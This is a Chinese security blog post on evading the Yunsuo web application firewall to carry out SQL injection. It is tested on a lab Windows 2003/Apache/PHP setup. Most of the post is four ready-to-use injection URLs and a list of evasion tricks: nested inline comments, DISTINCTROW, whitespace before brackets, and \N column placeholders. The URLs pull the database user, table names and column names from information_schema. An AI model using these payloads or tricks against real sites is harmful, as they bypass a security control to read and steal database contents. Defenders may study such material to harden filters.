小白安全博客

小白记忆
专注网络安全

 跳过云锁注入

环境
win03 + apache + php + 云锁最新版win_3.1.6
绕过
第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。
这里主要介绍下如何绕过正则。
先贴payload:
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3– -
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3– -
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select\N,table_name,\Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1– -
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select\N,column_name,\Nfrom information_schema.columns where table_name='users' limit 1 offset 1– -
 
技巧
1. 多重内联(/*!*/)+额外关键字(DISTINCTROW)
union select => /*!40000/*!30000union*/DISTINCTROW select
2. 函数和括号间增加空白符
user() => user ()
3. select 1,table_name,3 => select\N,table_name,\Nfrom


×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏,请先点一下下面的付款方式

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

 您阅读这篇文章共花了:

打赏作者
版权所有,转载注明出处:小白安全博客-菜鸟安全博客-小白个人博客 » 跳过云锁注入»https://www.xiaobaibk.com/xiao-bai-192.html

发表评论

表情

网友评论(0)